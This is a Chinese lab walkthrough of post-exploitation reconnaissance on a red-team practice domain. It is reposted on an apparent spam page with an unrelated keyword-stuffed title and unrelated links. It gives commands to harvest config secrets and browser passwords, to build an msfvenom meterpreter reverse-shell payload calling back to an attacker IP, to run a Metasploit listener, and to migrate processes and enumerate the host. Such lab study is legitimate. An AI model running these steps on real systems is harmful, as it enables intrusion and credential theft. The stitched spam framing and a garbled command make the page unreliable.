当前位置: 首页 > news >正文

中国冶金建设协会网站做网站用最新软件

中国冶金建设协会网站,做网站用最新软件,网站建设包含那些 内容,花色直播怎么看文章目录 一、配置文件敏感信息收集二、浏览器密码&记录三、MSF信息收集 域控:windows server 2008 域内机器:win7 攻击机:kali 就是红日靶场(一)的虚拟机。 一、配置文件敏感信息收集 使用searchall64.exe&#…

文章目录

  • 一、配置文件敏感信息收集
  • 二、浏览器密码&记录
  • 三、MSF信息收集

域控:windows server 2008
域内机器:win7
攻击机:kali

就是红日靶场(一)的虚拟机。

一、配置文件敏感信息收集

使用searchall64.exe,下图在win7上用的是3.5.6,3.5.9用不了,会报错。

searchall64.exe -p c:// # 收集C盘下的敏感信息

在这里插入图片描述

二、浏览器密码&记录

使用hack-browser-data-windows-64bit.exe,同样这里是在win7上运行,v0.4.3可用,v0.4.5用不了。
在这里插入图片描述

三、MSF信息收集

1、生成反弹木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.92.6 LPORT=4444 -f exe -o reverse_shell.exe

在这里插入图片描述

2、kali开启http服务,win7下载反弹shell

python3 -m http.server 9999

3、kali开始监听(使用msf)

msfconsole                                         # 在命令行里面输入命令,进入msf漏洞利用框架;
use exploit/multi/handler                          # 监听木马反弹过来的shell
msset payload windows/x64/meterpreter/reverse_tcp  	   # 设置payload,不同的木马设置不同的payload,设置payload时,要根据目标系统的系统位数设置相应的payload;
set lhost 192.168.92.6                          # 我们的kali本机ip
set lport 4444                                    # 我们的kali本机端口
exploit                                            # 开始进行监听;

在这里插入图片描述
在win7上运行反弹shelltest.exe,即可获取win7的shell。
在这里插入图片描述
注入到新的进程

getpid # 获取当前进程PID
ps # 查看系统进程
migrate -P <pid> # 迁移到相应pid的进程中

进入受害机shell

shell # 进入shell
chcp 65001 # 修改编码,解决控制台乱码问题

在这里插入图片描述

获取目标机器的分区信息

run post/windows/gather/forensics/enum_drives #获取目标机器的分区信息

在这里插入图片描述

判断是否是虚拟机:

run post/windows/gather/checkvm # 判断是否是虚拟机

在这里插入图片描述

开启了什么服务:

run post/windows/gather/enum_services # 开启了什么服务

在这里插入图片描述

安装了什么应用

run post/windows/gather/enum_applications # 安装了什么应用

在这里插入图片描述

获取主机最近的系统操作

post/windows/gather/dumplinks # 获取主机最近的系统操作

在这里插入图片描述

查看补丁

run post/windows/gather/enum_patches #查看补丁

在这里插入图片描述

http://www.yayakq.cn/news/691482/

相关文章:

  • 北京网站优化培训网站关键词推广价格
  • 广州口碑好的网站建设公司做网站需要什么资料
  • 通辽网站公司wordpress 管理密码忘记
  • 咸宁网站建设多少钱做网站 一年需要多少钱
  • 网站 栏目 英语3g下订单的网站怎么做
  • 网站标签怎样修改微信营销大师
  • 官网网站开发框架珠海斗门建设局官方网站
  • asp.netmvc 做网站做电子商务网站
  • 网站的优化是什么2020国内十大小说网站排名
  • ECMS做的网站wordpress折叠插件
  • 宜昌网站建设设计wordpress 正版插件吗
  • 古冶区城乡建设局网站济南做网站找大标
  • 网站keywords标签怎么写wordpress php7 iis
  • 企业官方网站地址网站建设费是什么意思
  • 个人社团网站怎么做网站建设必须配置
  • 网站显示已备案目标网站上做关键字布局
  • 企业网站网页设计的步骤怎样做模板网站
  • 网站qq交谈怎么做的扶余市建设局网站
  • 网站开发报价模版短视频软件开发
  • 专业的网站建设官网太原网站推广优化
  • 信息技术网站建设网络综合布线系统设计方案
  • 深圳招聘网站前十排名做网站会不会亏本
  • 空间商网站廊坊关键词优化报价
  • 六年级做的网站的软件wordpress 获取栏目名称
  • 城市建设模拟游戏官方网站wordpress dux1.3
  • 关于网站关停的申请中国建筑招投标平台
  • 网站原型设计广西建设网官网培训中心
  • 织梦网站源码转换成wordpresstradekey外贸平台官网
  • 沈阳网站建设兼职青岛当地的做公司网站的
  • 吉林省建设信息网站享学课堂 移动互联网开发